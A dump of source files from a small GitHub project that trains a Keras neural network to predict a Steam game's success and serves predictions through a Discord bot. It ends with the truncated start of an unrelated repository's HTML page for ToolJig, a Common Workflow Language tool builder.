"text": "# Description: Given a file of CSV training data, train an ANN and output the model and weights to a folder\r\n# to be loaded later. Note that CSV columns must match the size of the input + output layer.\r\n\r\nimport sys\r\nimport csv\r\nimport numpy as np\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense\r\nfrom keras.layers import InputLayer\r\n\r\nSCRIPT_ARGS = 3\r\nLAYER_1_SIZE = 34\r\nLAYER_2_SIZE = 25\r\nLAYER_3_SIZE = 1\r\nNUM_EPOCHS = 500\r\n\r\nif len(sys.argv) != SCRIPT_ARGS:\r\n sys.exit(-1)\r\n\r\n# prepare training data\r\ntrainingInput = []\r\ntrainingOutput = []\r\nwith open(sys.argv[1]) as csv_file:\r\n csv_reader = csv.reader(csv_file, delimiter=',')\r\n line_count = 0\r\n for row in csv_reader:\r\n row = [float(i) for i in row]\r\n trainingOutput += [[row.pop()]]\r\n trainingInput += [row]\r\n line_count += 1\r\n print(f'Processed {line_count} lines.')\r\ntraining_data = np.array(trainingInput, \"float32\")\r\ntarget_data = np.array(trainingOutput, \"float32\")\r\n\r\n# create model\r\nmodel = Sequential([\r\n InputLayer(input_shape=(LAYER_1_SIZE,)),\r\n Dense(LAYER_2_SIZE, activation='relu'),\r\n Dense(LAYER_3_SIZE, activation='sigmoid')])\r\nmodel.compile(loss='mean_squared_error',\r\n optimizer='adam',\r\n metrics=['binary_accuracy'])\r\n\r\n# train\r\nmodel.fit(training_data, target_data, epochs=NUM_EPOCHS, verbose=2)\r\n\r\n# save model and weights to folder\r\nmodel.save(sys.argv[2])\r\n"
},
{
"alpha_fraction": 0.5345319509506226,
"alphanum_fraction": 0.5624302625656128,
"avg_line_length": 43.05586624145508,
"blob_id": "490ce9f2d63a00fbe52f080ac8ba3a7e783cc479",
"content_id": "522244c78931ae56e46a0e189898034d085f1972",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8065,
"license_type": "permissive",
"max_line_length": 360,
"num_lines": 179,
"path": "/predict.py",
"repo_name": "ShawnAndrews/GamesSuccessPredictor",
"src_encoding": "UTF-8",
"text": "# Description: Make a neural network classification given a trained model and input parameters.\r\n\r\nimport sys\r\nimport numpy as np\r\nfrom keras.models import load_model\r\n\r\nif len(sys.argv) < 3:\r\n sys.exit(-1)\r\n\r\n# load model and weights\r\nmodel = load_model(\"model\")\r\n\r\n# prepare arguments\r\nargs = sys.argv[2:]\r\nparams = dict()\r\nparams['price'] = 0\r\nparams['age_required'] = 0\r\nparams['dlc'] = 0\r\nparams['achievements'] = 0\r\nparams['windows'] = 0\r\nparams['mac'] = 0\r\nparams['linux'] = 0\r\nparams['release_month'] = 0\r\nparams['c_singleplayer'] = 0\r\nparams['c_mmo'] = 0\r\nparams['c_coop'] = 0\r\nparams['c_inapppurchases'] = 0\r\nparams['c_controllersupport'] = 0\r\nparams['c_pvp'] = 0\r\nparams['g_adventure'] = 0\r\nparams['g_casual'] = 0\r\nparams['g_indie'] = 0\r\nparams['g_simulation'] = 0\r\nparams['g_action'] = 0\r\nparams['g_multiplayer'] = 0\r\nparams['g_rpg'] = 0\r\nparams['g_strategy'] = 0\r\nparams['g_racing'] = 0\r\nparams['g_sports'] = 0\r\nparams['g_2d'] = 0\r\nparams['g_puzzle'] = 0\r\nparams['g_vr'] = 0\r\nparams['g_platformer'] = 0\r\nparams['g_horror'] = 0\r\nparams['g_shooter'] = 0\r\nparams['g_firstperson'] = 0\r\nparams['g_survival'] = 0\r\nparams['g_turnbased'] = 0\r\nparams['g_space'] = 0\r\n\r\nif args[0] == 'free':\r\n params['price'] = 0.00\r\nelif float(args[0]) >= 0 and float(args[0]) <= 80.00:\r\n params['price'] = round(float(args[0]) / 80.00, 2)\r\nelse:\r\n print(f\"Validation failed: Price must be either 'free' or a number \"\r\n f\"between 0 and 80. You entered '{args[0]}'.\")\r\n sys.exit(-1)\r\nif args[1].isnumeric() and int(args[1]) >= 0 and int(args[1]) <= 18:\r\n params['age_required'] = round(int(args[1]) / 18, 2)\r\nelse:\r\n print(f\"Validation failed: Age restriction must be a number between 0 and 18. You entered '{args[1]}'.\")\r\n sys.exit(-1)\r\nif args[2] == \"false\" or args[2] == \"true\":\r\n if args[2] == \"false\":\r\n params['dlc'] = 0\r\n else:\r\n params['dlc'] = 1\r\nelse:\r\n print(f\"Validation failed: DLC availability must be a value of 'false' or 'true'. You entered '{args[2]}'.\")\r\n sys.exit(-1)\r\nif args[3] == \"false\" or args[3] == \"true\":\r\n if args[3] == \"false\":\r\n params['achievements'] = 0\r\n else:\r\n params['achievements'] = 1\r\nelse:\r\n print(\r\n f\"Validation failed: Achievements availability must be a value of 'false' or 'true'. You entered '{args[3]}'.\")\r\n sys.exit(-1)\r\nif args[4] == \"false\" or args[4] == \"true\":\r\n if args[4] == \"false\":\r\n params['windows'] = 0\r\n else:\r\n params['windows'] = 1\r\nelse:\r\n print(f\"Validation failed: Windows availability must be a value of 'false' or 'true'. You entered '{args[4]}'.\")\r\n sys.exit(-1)\r\nif args[5] == \"false\" or args[5] == \"true\":\r\n if args[5] == \"false\":\r\n params['mac'] = 0\r\n else:\r\n params['mac'] = 1\r\nelse:\r\n print(f\"Validation failed: Mac availability must be a value of 'false' or 'true'. You entered '{args[5]}'.\")\r\n sys.exit(-1)\r\nif args[6] == \"false\" or args[6] == \"true\":\r\n if args[6] == \"false\":\r\n params['linux'] = 0\r\n else:\r\n params['linux'] = 1\r\nelse:\r\n print(f\"Validation failed: Linux availability must be a value of 'false' or 'true'. You entered '{args[6]}'.\")\r\n sys.exit(-1)\r\nif params['linux'] == 0 and params['windows'] == 0 and params['mac'] == 0:\r\n print(f\"Validation failed: You need to port to at least one platform, windows, linux, or mac. You entered false \"\r\n f\"for all.\")\r\n sys.exit(-1)\r\nif args[7].isnumeric() and int(args[7]) >= 0 and int(args[7]) <= 12:\r\n params['release_month'] = round(int(args[7]) / 12, 2)\r\nelif args[7].startswith('jan') or args[7].startswith('feb') or args[7].startswith('mar') or args[7].startswith('apr') or \\\r\n args[7].startswith('may') or args[7].startswith('jun') or args[7].startswith('jul') or args[7].startswith(\r\n 'aug') or args[7].startswith('sep') or args[7].startswith('oct') or args[7].startswith('nov') or args[\r\n 7].startswith('dec'):\r\n if args[7].startswith('jan'): params['release_month'] = 0.08\r\n if args[7].startswith('feb'): params['release_month'] = 0.16\r\n if args[7].startswith('mar'): params['release_month'] = 0.25\r\n if args[7].startswith('apr'): params['release_month'] = 0.33\r\n if args[7].startswith('may'): params['release_month'] = 0.41\r\n if args[7].startswith('jun'): params['release_month'] = 0.50\r\n if args[7].startswith('jul'): params['release_month'] = 0.58\r\n if args[7].startswith('aug'): params['release_month'] = 0.66\r\n if args[7].startswith('sept'): params['release_month'] = 0.75\r\n if args[7].startswith('oct'): params['release_month'] = 0.83\r\n if args[7].startswith('nov'): params['release_month'] = 0.91\r\n if args[7].startswith('dec'): params['release_month'] = 1.00\r\nelse:\r\n print(\r\n f\"Validation failed: Month of release must be a value between [0, 12], [jan, dec], or [january, december]. You entered '{args[7]}'.\")\r\n sys.exit(-1)\r\n\r\nfor i in args[8:]:\r\n if i == \"singleplayer\" or i == \"mmo\" or i == \"coop\" or i == \"inapppurchases\" or i == \"controllersupport\" or i == \"pvp\":\r\n if i == \"singleplayer\": params['c_singleplayer'] = 1\r\n if i == \"mmo\": params['c_mmo'] = 1\r\n if i == \"coop\": params['c_coop'] = 1\r\n if i == \"inapppurchases\": params['c_inapppurchases'] = 1\r\n if i == \"controllersupport\": params['c_controllersupport'] = 1\r\n if i == \"pvp\": params['c_pvp'] = 1\r\n elif i == \"adventure\" or i == \"casual\" or i == \"indie\" or i == \"simulation\" or i == \"action\" or i == \"multiplayer\" or i == \"rpg\" or i == \"racing\" or i == \"sports\" or i == \"2d\" or i == \"puzzle\" or i == \"racing\" or i == \"vr\" or i == \"platformer\" or i == \"horror\" or i == \"shooter\" or i == \"firstperson\" or i == \"survival\" or i == \"turnbased\" or i == \"space\":\r\n if i == \"adventure\": params['g_adventure'] = 1\r\n if i == \"casual\": params['g_casual'] = 1\r\n if i == \"indie\": params['g_indie'] = 1\r\n if i == \"simulation\": params['g_simulation'] = 1\r\n if i == \"action\": params['g_action'] = 1\r\n if i == \"multiplayer\": params['g_multiplayer'] = 1\r\n if i == \"rpg\": params['g_rpg'] = 1\r\n if i == \"strategy\": params['g_strategy'] = 1\r\n if i == \"racing\": params['g_racing'] = 1\r\n if i == \"sports\": params['g_sports'] = 1\r\n if i == \"2d\": params['g_2d'] = 1\r\n if i == \"puzzle\": params['g_puzzle'] = 1\r\n if i == \"vr\": params['g_vr'] = 1\r\n if i == \"platformer\": params['g_platformer'] = 1\r\n if i == \"horror\": params['g_horror'] = 1\r\n if i == \"shooter\": params['g_shooter'] = 1\r\n if i == \"firstperson\": params['g_firstperson'] = 1\r\n if i == \"survival\": params['g_survival'] = 1\r\n if i == \"turnbased\": params['g_turnbased'] = 1\r\n if i == \"space\": params['g_space'] = 1\r\n else:\r\n print(f\"Validation failed: Category or genre entered was not \"\r\n f\"an acceptable value. You entered '{i}'.\")\r\n sys.exit(-1)\r\n\r\n# predict\r\nmodelParameters = np.array([[params['price'], params['age_required'], params['dlc'], params['achievements'],\r\n params['windows'], params['mac'], params['linux'], params['release_month'],\r\n params['c_singleplayer'], params['c_mmo'], params['c_coop'],\r\n params['c_inapppurchases'], params['c_controllersupport'], params['c_pvp'],\r\n params['g_adventure'], params['g_casual'], params['g_indie'], params['g_simulation'],\r\n params['g_action'], params['g_multiplayer'], params['g_rpg'], params['g_strategy'],\r\n params['g_racing'], params['g_sports'], params['g_2d'], params['g_puzzle'],\r\n params['g_vr'], params['g_platformer'], params['g_horror'], params['g_shooter'],\r\n params['g_firstperson'], params['g_survival'], params['g_turnbased'],\r\n params['g_space']]], \"float32\")\r\nprediction = model.predict(modelParameters)[0][0]\r\n\r\nsys.exit(prediction)\r\n"
},
{
"alpha_fraction": 0.6201022267341614,
"alphanum_fraction": 0.6385982036590576,
"avg_line_length": 40.92856979370117,
"blob_id": "78651ef646e4b78dbbe54523501e79518272b7ff",
"content_id": "330eae135719c8b0a5272a9326cf0af1a596c239",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 4119,
"license_type": "permissive",
"max_line_length": 268,
"num_lines": 98,
"path": "/README.md",
"repo_name": "ShawnAndrews/GamesSuccessPredictor",
"src_encoding": "UTF-8",
"text": "<h1 align=\"center\">\n <br>\n <a href=\"https://i.imgur.com/rYvoOls.png\"><img src=\"https://i.imgur.com/rYvoOls.png\" alt=\"logo\" width=\"200\"></a>\n <br>\n Games Success Predictor (GSP)\n <br>\n</h1>\n\n<h4 align=\"center\">This project is a 3-layer Feed Forward Neural Network (FFNN) that trains on the success and parameters of video games in the <a href=\"https://store.steampowered.com/\" target=\"_blank\">Steam</a> library to predict the future success of your game!</h4>\n\n<p align=\"center\">\n <a href=\"https://discord.gg/SparkleParty\">\n <img src=\"https://img.shields.io/discord/377121551104999424?logo=discord\" alt=\"Discord\"></a>\n <a href=\"https://github.com/ShawnAndrews/GamesSuccessPredictor\" alt=\"GitHub release\">\n <img src=\"https://img.shields.io/github/release/shawnandrews/GamesSuccessPredictor.svg\" /></a>\n <a href=\"https://github.com/ShawnAndrews/GamesSuccessPredictor/blob/master/LICENSE\" alt=\"GitHub license\">\n <img src=\"https://img.shields.io/github/license/shawnandrews/GamesSuccessPredictor.svg\" /></a>\n</p>\n\n<p align=\"center\">\n <a href=\"#key-features\">Key Features</a> •\n <a href=\"#neural-network\">Neural Network</a> •\n <a href=\"#how-to-use\">How To Use</a> •\n <a href=\"#discords\">Discords</a> •\n <a href=\"#faq\">FAQ</a> •\n <a href=\"#license\">License</a>\n</p>\n\n\n\n## Key Features\n\n* Help determine the best month to release your game\n* Help find the best price point for your game to sell as many copies as possible\n* Help choose if it is worth the effort to port your game to other platforms\n* Help weigh the benefits of additional features such a controller and VR support\n* Help influence the direction of your game in terms of genres\n* Help pick the gameplay modes such as pvp, singleplayer, or multiplayer\n* Help decide the advantage of adding an achievements system\n* Help weigh the value of Downloadable Content (DLC)\n* Help choose whether an age restriction will negatively or positively effect the success of your game\n\n## Neural Network\n\nThe tensorflow artificial neural network is comprised of 3 dense layers and 1225 total parameters.\n\n<a href=\"https://i.imgur.com/BVxK2fZ.png\"><img src=\"https://i.imgur.com/BVxK2fZ.png\" alt=\"visual\"></a>\n\n```\n_________________________________________________________________\nLayer (type) Output Shape Param # \n=================================================================\ninput_1 (InputLayer) (None, 34) 0\n_________________________________________________________________\ndense (Dense) (None, 25) 875 \n_________________________________________________________________\ndense_1 (Dense) (None, 1) 26 \n=================================================================\nTotal params: 1225\nTrainable params: 1225\nNon-trainable params: 0\n_________________________________________________________________\n```\n\n## How To Use\n\nPre-requisite: You must install both Discord.py and Tensorflow for Python. Additional installs needed to allow GPU-accelerated training.\n\n```python\n# Train on CSV training data file \"TrainingData.txt\" and output model with weights to a folder \"model\"\n$ python train.py csvData.txt model\n\n# Perform a prediction given a loaded model and game information\n$ python predict.py model free 0 true false true true true december multiplayer mmo controllersupport horror survival\n\n# Start Discord bot\n$ python bot.py model DISCORD_BOT_TOKEN_KEY\n```\n\n## Discords\n\nHere is a list of discords with the bot currently active:\n\n<a href=\"https://discord.gg/SparkleParty\">\n <img src=\"https://img.shields.io/discord/377121551104999424?logo=discord\" alt=\"Discord\"></a>\n\nGet the bot to join your discord today! [Click here](https://discord.gg)\n\n\n## FAQ\n\n**Question:** Where is the training data?\n\n**Answer:** The Steam data was intentionally excluded from the project. To create the training data you'll need to scrape the game and review data from the Steam API, then write the records to a text file in the specified CSV format.\n\n## License\n\nMIT\n"
},
{
"alpha_fraction": 0.5032267570495605,
"alphanum_fraction": 0.5231673121452332,
"avg_line_length": 55.22406768798828,
"blob_id": "b6cf66164e022eb4768458c7f839ebcabde67211",
"content_id": "44700535bb4e729cfb5aa74ddf32fc323689d87b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 13802,
"license_type": "permissive",
"max_line_length": 430,
"num_lines": 241,
"path": "/bot.py",
"repo_name": "ShawnAndrews/GamesSuccessPredictor",
"src_encoding": "UTF-8",
"text": "# Description: Start a Discord bot which responds to game prediction requests from users based on a given trained model.\r\n\r\nimport sys\r\nimport os\r\nimport discord\r\nimport numpy as np\r\nfrom keras.models import load_model\r\n\r\nif len(sys.argv) != 3:\r\n sys.exit(-1)\r\n\r\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"-1\" # force CPU-only\r\n\r\nTOKEN = sys.argv[2]\r\nclient = discord.Client()\r\nmodel = load_model(sys.argv[1])\r\n\r\n\r\[email protected]\r\nasync def on_ready():\r\n print(f'{client.user} has connected to Discord!')\r\n\r\n\r\[email protected]\r\nasync def on_message(message):\r\n command = message.content.lower()\r\n\r\n if message.author == client.user or str(message.channel) != \"🎲┋gsp-bot\":\r\n return\r\n if command.startswith(\"!predict\"):\r\n if command == \"!predict\":\r\n return_msg = (\r\n f\"```\"\r\n f\"Description:\\n\"\r\n f\" This bot has been trained as a Feed Forward Neural Network (FFNN) on the success and parameters of \"\r\n f\"over 20,000+ Steam games! Given the parameters of any hypothetical game, we can use this neural \"\r\n f\"network model to predict the game's future success on the Steam market. I hope this will be useful \"\r\n f\"as a \"\r\n f\"tool during game development to answer questions such as: what is the best price point for my game, \"\r\n f\"which month should i release my game, should i invest time into porting to other platforms, \"\r\n f\"or will adding multiplayer boost the chance of my game's success or not.\\n\\n \"\r\n f\"Parameters:\\n\"\r\n f\" 1.) Price - <float>\\n\"\r\n f\" Acceptable values - [0.00, 80.00]\\n\"\r\n f\" 2.) Age_required - <integer>\\n\"\r\n f\" Acceptable values - [0, 18]\\n\"\r\n f\" 3.) DLC available - <boolean>\\n\"\r\n f\" 4.) Steam Achievements - <boolean>\\n\"\r\n f\" 5.) Windows port - <boolean>\\n\"\r\n f\" 6.) Mac port - <boolean>\\n\"\r\n f\" 7.) Linux port - <boolean>\\n\"\r\n f\" 8.) Month of release - <integer>\\n\"\r\n f\" Acceptable values - [0, 12], [jan, dec], [january, december]\\n\"\r\n f\" 9.) Categories - <string> ... <string>\\n\"\r\n f\" Acceptable values - singleplayer, mmo, coop, inapppurchases, controllersupport, pvp\\n\"\r\n f\" 10.) Genres - <string> ... <string>\\n\"\r\n f\" Acceptable values - adventure, casual, indie, simulation, action, multiplayer, rpg, strategy, \"\r\n f\"racing, sports, 2d, puzzle, vr, platformer, horror, shooter, firstperson, survival, turnbased, \"\r\n f\"space\\n\\n \"\r\n f\"Examples:\\n\"\r\n f\" 1.) !predict free 18 false true true false false august singleplayer action adventure puzzle\\n\"\r\n f\" 2.) !predict 19.99 0 true false true true true december multiplayer mmo controllersupport horror \"\r\n f\"survival\\n \"\r\n f\"```\"\r\n )\r\n await message.channel.send(return_msg)\r\n return\r\n\r\n # build parameters\r\n params = dict()\r\n params['price'] = 0\r\n params['age_required'] = 0\r\n params['dlc'] = 0\r\n params['achievements'] = 0\r\n params['windows'] = 0\r\n params['mac'] = 0\r\n params['linux'] = 0\r\n params['release_month'] = 0\r\n params['c_singleplayer'] = 0\r\n params['c_mmo'] = 0\r\n params['c_coop'] = 0\r\n params['c_inapppurchases'] = 0\r\n params['c_controllersupport'] = 0\r\n params['c_pvp'] = 0\r\n params['g_adventure'] = 0\r\n params['g_casual'] = 0\r\n params['g_indie'] = 0\r\n params['g_simulation'] = 0\r\n params['g_action'] = 0\r\n params['g_multiplayer'] = 0\r\n params['g_rpg'] = 0\r\n params['g_strategy'] = 0\r\n params['g_racing'] = 0\r\n params['g_sports'] = 0\r\n params['g_2d'] = 0\r\n params['g_puzzle'] = 0\r\n params['g_vr'] = 0\r\n params['g_platformer'] = 0\r\n params['g_horror'] = 0\r\n params['g_shooter'] = 0\r\n params['g_firstperson'] = 0\r\n params['g_survival'] = 0\r\n params['g_turnbased'] = 0\r\n params['g_space'] = 0\r\n\r\n # validate input\r\n commandArr = command.split()\r\n if commandArr[1] == 'free':\r\n params['price'] = 0.00\r\n elif float(commandArr[1]) >= 0 and float(commandArr[1]) <= 80.00:\r\n params['price'] = round(float(commandArr[1]) / 80.00, 2)\r\n else:\r\n await message.channel.send(f\"<@{message.author.id}> Validation failed: Price must be either 'free' or a number \"\r\n f\"between 0 and 80. You entered '{commandArr[1]}'.\")\r\n return\r\n if commandArr[2].isnumeric() and int(commandArr[2]) >= 0 and int(commandArr[2]) <= 18:\r\n params['age_required'] = round(int(commandArr[2]) / 18, 2)\r\n else:\r\n await message.channel.send(f\"<@{message.author.id}> Validation failed: Age restriction must be a number between 0 and 18. You entered '{commandArr[2]}'.\")\r\n return\r\n if commandArr[3] == \"false\" or commandArr[3] == \"true\":\r\n if commandArr[3] == \"false\":\r\n params['dlc'] = 0\r\n else:\r\n params['dlc'] = 1\r\n else:\r\n await message.channel.send(f\"<@{message.author.id}> Validation failed: DLC availability must be a value of 'false' or 'true'. You entered '{commandArr[3]}'.\")\r\n return\r\n if commandArr[4] == \"false\" or commandArr[4] == \"true\":\r\n if commandArr[4] == \"false\":\r\n params['achievements'] = 0\r\n else:\r\n params['achievements'] = 1\r\n else:\r\n await message.channel.send(f\"<@{message.author.id}> Validation failed: Achievements availability must be a value of 'false' or 'true'. You entered '{commandArr[4]}'.\")\r\n return\r\n if commandArr[5] == \"false\" or commandArr[5] == \"true\":\r\n if commandArr[5] == \"false\":\r\n params['windows'] = 0\r\n else:\r\n params['windows'] = 1\r\n else:\r\n await message.channel.send(f\"<@{message.author.id}> Validation failed: Windows availability must be a value of 'false' or 'true'. You entered '{commandArr[5]}'.\")\r\n return\r\n if commandArr[6] == \"false\" or commandArr[6] == \"true\":\r\n if commandArr[6] == \"false\":\r\n params['mac'] = 0\r\n else:\r\n params['mac'] = 1\r\n else:\r\n await message.channel.send(f\"<@{message.author.id}> Validation failed: Mac availability must be a value of 'false' or 'true'. You entered '{commandArr[6]}'.\")\r\n return\r\n if commandArr[7] == \"false\" or commandArr[7] == \"true\":\r\n if commandArr[7] == \"false\":\r\n params['linux'] = 0\r\n else:\r\n params['linux'] = 1\r\n else:\r\n await message.channel.send(f\"<@{message.author.id}> Validation failed: Linux availability must be a value of 'false' or 'true'. You entered '{commandArr[7]}'.\")\r\n return\r\n if params['linux'] == 0 and params['windows'] == 0 and params['mac'] == 0:\r\n await message.channel.send(\r\n f\"<@{message.author.id}> Validation failed: You need to port to at least one platform, windows, linux, or mac. You entered false for all.\")\r\n return\r\n if commandArr[8].isnumeric() and int(commandArr[8]) >= 0 and int(commandArr[8]) <= 12:\r\n params['release_month'] = round(int(commandArr[8]) / 12, 2)\r\n elif commandArr[8].startswith('jan') or commandArr[8].startswith('feb') or commandArr[8].startswith('mar') or commandArr[8].startswith('apr') or commandArr[8].startswith('may') or commandArr[8].startswith('jun') or commandArr[8].startswith('jul') or commandArr[8].startswith('aug') or commandArr[8].startswith('sep') or commandArr[8].startswith('oct') or commandArr[8].startswith('nov') or commandArr[8].startswith('dec'):\r\n if commandArr[8].startswith('jan'): params['release_month'] = 0.08\r\n if commandArr[8].startswith('feb'): params['release_month'] = 0.16\r\n if commandArr[8].startswith('mar'): params['release_month'] = 0.25\r\n if commandArr[8].startswith('apr'): params['release_month'] = 0.33\r\n if commandArr[8].startswith('may'): params['release_month'] = 0.41\r\n if commandArr[8].startswith('jun'): params['release_month'] = 0.50\r\n if commandArr[8].startswith('jul'): params['release_month'] = 0.58\r\n if commandArr[8].startswith('aug'): params['release_month'] = 0.66\r\n if commandArr[8].startswith('sept'): params['release_month'] = 0.75\r\n if commandArr[8].startswith('oct'): params['release_month'] = 0.83\r\n if commandArr[8].startswith('nov'): params['release_month'] = 0.91\r\n if commandArr[8].startswith('dec'): params['release_month'] = 1.00\r\n else:\r\n await message.channel.send(f\"<@{message.author.id}> Validation failed: Month of release must be a value between [0, 12], [jan, dec], or [january, december]. You entered '{commandArr[8]}'.\")\r\n return\r\n\r\n for i in commandArr[9:]:\r\n if i == \"singleplayer\" or i == \"mmo\" or i == \"coop\" or i == \"inapppurchases\" or i == \"controllersupport\" or i == \"pvp\":\r\n if i == \"singleplayer\": params['c_singleplayer'] = 1\r\n if i == \"mmo\": params['c_mmo'] = 1\r\n if i == \"coop\": params['c_coop'] = 1\r\n if i == \"inapppurchases\": params['c_inapppurchases'] = 1\r\n if i == \"controllersupport\": params['c_controllersupport'] = 1\r\n if i == \"pvp\": params['c_pvp'] = 1\r\n elif i == \"adventure\" or i == \"casual\" or i == \"indie\" or i == \"simulation\" or i == \"action\" or i == \"multiplayer\" or i == \"rpg\" or i == \"racing\" or i == \"sports\" or i == \"2d\" or i == \"puzzle\" or i == \"racing\" or i == \"vr\" or i == \"platformer\" or i == \"horror\" or i == \"shooter\" or i == \"firstperson\" or i == \"survival\" or i == \"turnbased\" or i == \"space\" or i == \"strategy\":\r\n if i == \"adventure\": params['g_adventure'] = 1\r\n if i == \"casual\": params['g_casual'] = 1\r\n if i == \"indie\": params['g_indie'] = 1\r\n if i == \"simulation\": params['g_simulation'] = 1\r\n if i == \"action\": params['g_action'] = 1\r\n if i == \"multiplayer\": params['g_multiplayer'] = 1\r\n if i == \"rpg\": params['g_rpg'] = 1\r\n if i == \"strategy\": params['g_strategy'] = 1\r\n if i == \"racing\": params['g_racing'] = 1\r\n if i == \"sports\": params['g_sports'] = 1\r\n if i == \"2d\": params['g_2d'] = 1\r\n if i == \"puzzle\": params['g_puzzle'] = 1\r\n if i == \"vr\": params['g_vr'] = 1\r\n if i == \"platformer\": params['g_platformer'] = 1\r\n if i == \"horror\": params['g_horror'] = 1\r\n if i == \"shooter\": params['g_shooter'] = 1\r\n if i == \"firstperson\": params['g_firstperson'] = 1\r\n if i == \"survival\": params['g_survival'] = 1\r\n if i == \"turnbased\": params['g_turnbased'] = 1\r\n if i == \"space\": params['g_space'] = 1\r\n else:\r\n await message.channel.send(f\"<@{message.author.id}> Validation failed: Category or genre entered was not \"\r\n f\"an acceptable value. You entered '{i}'.\")\r\n return\r\n\r\n # predict\r\n modelParameters = np.array([[params['price'], params['age_required'], params['dlc'], params['achievements'],\r\n params['windows'], params['mac'], params['linux'], params['release_month'],\r\n params['c_singleplayer'], params['c_mmo'], params['c_coop'],\r\n params['c_inapppurchases'], params['c_controllersupport'], params['c_pvp'],\r\n params['g_adventure'], params['g_casual'], params['g_indie'], params['g_simulation'],\r\n params['g_action'], params['g_multiplayer'], params['g_rpg'], params['g_strategy'],\r\n params['g_racing'], params['g_sports'], params['g_2d'], params['g_puzzle'],\r\n params['g_vr'], params['g_platformer'], params['g_horror'], params['g_shooter'],\r\n params['g_firstperson'], params['g_survival'], params['g_turnbased'],\r\n params['g_space']]], \"float32\")\r\n prediction = model.predict(modelParameters)[0][0]\r\n\r\n # send\r\n predictionPercent = round(prediction * 100, 2)\r\n await message.channel.send(f\"<@{message.author.id}>\\nI predict your game has a **{predictionPercent}%** chance of \"\r\n f\"success on the Steam market!\\n\"\r\n f\"{'Is it too late to start over?' if predictionPercent < 50 else ''}\"\r\n f\"{'Consider making a few changes to improve your chances!' if predictionPercent >= 50 and predictionPercent < 70 else ''}\"\r\n f\"{'Your game has real potential! 👀' if predictionPercent >= 70 and predictionPercent < 90 else ''}\"\r\n f\"{'Ship it right now!! 📦' if predictionPercent >= 90 and predictionPercent <= 100 else ''}\\n\")\r\n\r\n# connect to Discord\r\nclient.run(TOKEN)\r\n"
}
] | 4 |
srp33/ToolJig | https://github.com/srp33/ToolJig | a9ea34e10cbdb0a15091a8b2e9b287daa27e0706 | d7843c4137a02c3aa438b2684bbeb6d210e2e9d7 | c031d3b120d0b8f21d1ff4d42e8d7defe3d040a0 | refs/heads/master | 2023-07-06T20:02:57.142585 | 2021-12-06T19:15:37 | 2021-12-06T19:15:37 | 254,453,061 | 6 | 2 | null | null | null | null | null | [
{
"alpha_fraction": 0.5888596177101135,
"alphanum_fraction": 0.6108896732330322,
"avg_line_length": 97.89696502685547,
"blob_id": "0a566880a1eda6609d0c0b2fadabd6be56b13052",
"content_id": "51ec30b3be7366752f0080dba0b1d59a27eae59a",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 231320,
"license_type": "permissive",
"max_line_length": 1990,
"num_lines": 2339,
"path": "/tool.html",
"repo_name": "srp33/ToolJig",
"src_encoding": "UTF-8",
"text": "<!-- Author: Stephen R. Piccolo -->\n<!-- Contact: https://piccolo.byu.edu -->\n\n<!DOCTYPE html>\n<html lang=\"en\">\n<head>\n <meta charset=\"UTF-8\" />\n <title>Tooljig: A simpler approach to building Common Workflow Language tools and workflows</title>\n <link rel=\"stylesheet\" href=\"https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/css/bootstrap.min.css\">\n</head>\n<body>\n\n<!--Here we import any JavaScript libraries that we need.-->\n<!--Dev version of Vue<script<script src=\"https://cdn.jsdelivr.net/npm/vue/dist/vue.js\"></script>-->\n<!--Production version of Vue--><script src=\"https://cdn.jsdelivr.net/npm/[email protected]\"></script>\n<script src=\"https://cdnjs.cloudflare.com/ajax/libs/js-yaml/3.14.0/js-yaml.min.js\"></script>\n\n<!--Here we define any custom CSS attributes that we want to use.-->\n<style>\n .panel-default {\n cursor: pointer;\n background-color: #f7f2ef;\n color:#000000;\n padding-top: 10px;\n padding-bottom: 10px;\n padding-left: 10px;\n padding-right: 10px;\n border-radius: 4px 4px 0px 0px;\n border: 1px solid #f7f2ef;\n}\n</style>\n\n<div class=\"container\" align=\"left\">\n <div id=\"cwl_app\">\n <h2>ToolJig: A simple approach to building Common Workflow Language tool descriptions and workflows</h2>\n\n <p><img src=\"https://github.com/srp33/ToolJig/raw/master/Logo.jpg\" width=\"400\" /><br /><small><a href=\"https://unsplash.com/@vekonyorsi\" target=\"_blank\" class=\"text-muted\" style=\"font-size: 10px\">Image credit</a></small>\n </p>\n\n <p>The <a href=\"https://www.commonwl.org/\" target=\"_blank\">Common Workflow Language</a> (CWL) is an open specification for describing command-line tools and workflows. CWL documents are used in many scientific disciplines to ensure that tools and workflows can be executed in a manner that is portable across workflow engines and computer systems. <em>ToolJig</em> facilitates creation of CWL tool descriptions, workflows, and input-object files for those tools. <a href=\"https://youtu.be/0vOOBzW5AS4\" target=\"_blank\">This video</a> provides insight about ToolJig. <strong>This portion of ToolJig focuses on building tool descriptions.</strong> Use <a href=\"workflow.html\" target=\"_blank\">this app</a> if you wish to create workflows.</p>\n\n <p>Tool descriptions created in ToolJig are compatible with v1.2 (or 1.0 or 1.1) of the <a href=\"https://commonwl.org/v1.2\" target=\"_blank\">CWL specification</a>. You can see some example CWL tool descriptions <a href=\"https://github.com/srp33/ToolJig\" target=\"_blank\">here</a>. Our goal is support <em>common</em> use cases for research analyses. However, some options within the CWL specification are <em>not</em> supported; users should consult the specification if they wish to use other available features.\n\n <p>This app was created by the <a href=\"https://piccolo.byu.edu\">Piccolo lab</a>. You can read our paper <a href=\"https://elifesciences.org/articles/71069\" target=\"_blank\">here</a>. We are open to your feedback! Please submit an <a href=\"https://github.com/srp33/ToolJig/issues\" target=\"_blank\">issue</a> if you would like to report a bug or request a feature.</a></p>\n\n <hr style=\"border: 1px solid black;border-radius: 1px;\" />\n\n <h4 class=\"card-title\">Upload existing file (optional):</h4>\n\n <p>If you previously created a CWL tool description using ToolJig, you can upload it and then edit the information below. <font color=\"darkorange\">(Uploading an existing file may not work for CWL files that were not created using alternative means.)</font> If you do <em>not</em> need to edit an existing CWL file, skip this step.</p>\n\n <div class=\"form-group\">\n <input id=\"upload_file\" type=\"file\" placeholder=\"Please specify a file to be uploaded.\" 